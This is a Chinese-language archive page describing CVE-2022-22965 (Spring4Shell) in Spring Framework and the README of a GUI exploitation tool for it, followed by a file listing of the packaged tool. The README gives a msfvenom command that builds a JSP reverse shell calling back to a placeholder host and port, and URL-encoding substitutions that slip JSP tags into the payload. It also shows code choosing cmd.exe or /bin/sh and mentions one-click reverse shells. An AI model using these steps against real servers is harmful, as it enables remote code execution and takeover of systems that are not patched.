关联漏洞
标题:
Spring Framework 代码注入漏洞
(CVE-2022-22965)
描述:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞,该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响:5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。
描述
CVE-2022-22965图形化检测工具
介绍
靶机
```bash
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest
```
反弹shell实质为参照msfvenom
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp
```
将jsp url编码后,用
```html
%3C%25替换 %25%7Bc2%7Di 代表<%
%25%3E 替换 %25%7Bsuffix%7Di 代表 %>
```
代码中针对不同类型服务器进行了shellpath的修改判断
```python
if self.radioButton_win.isChecked():
shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
shellpath = "/bin/sh"
```
命令执行:

whoami探测:

一键反弹shell

文件快照
[4.0K] /data/pocs/43fdbc49d7728556929e7171826b3af6db6cc265
├── [4.0K] build
│ └── [4.0K] main
│ ├── [ 51K] Analysis-00.toc
│ ├── [1014K] base_library.zip
│ ├── [ 19K] EXE-00.toc
│ ├── [ 24K] generated-7306dd1d30b36496bfe797ae76329bb8d9f2282fd4a89aa02134b66de1c22e3a.ico
│ ├── [4.0K] localpycs
│ │ ├── [8.8K] pyimod01_archive.pyc
│ │ ├── [ 17K] pyimod02_importers.pyc
│ │ ├── [4.0K] pyimod03_ctypes.pyc
│ │ ├── [ 717] pyimod04_pywin32.pyc
│ │ └── [ 285] struct.pyc
│ ├── [1.4K] main.exe.manifest
│ ├── [ 43M] main.pkg
│ ├── [ 17K] PKG-00.toc
│ ├── [1.5M] PYZ-00.pyz
│ ├── [ 34K] PYZ-00.toc
│ ├── [3.6K] warn-main.txt
│ └── [504K] xref-main.html
├── [4.0K] dist
│ ├── [6.9K] hackaday.png
│ └── [ 44M] main.exe
├── [6.9K] hackaday.png
├── [4.0K] img
│ ├── [119K] cmd.png
│ ├── [320K] reverse.png
│ └── [112K] whoami.png
├── [ 659] main.py
├── [ 829] main.spec
├── [ 15K] myui.py
├── [5.2K] myui.ui
├── [ 17K] p.ico
├── [4.0K] __pycache__
│ ├── [ 712] main.cpython-37.pyc
│ └── [ 11K] myui.cpython-39.pyc
└── [ 646] README.md
6 directories, 30 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。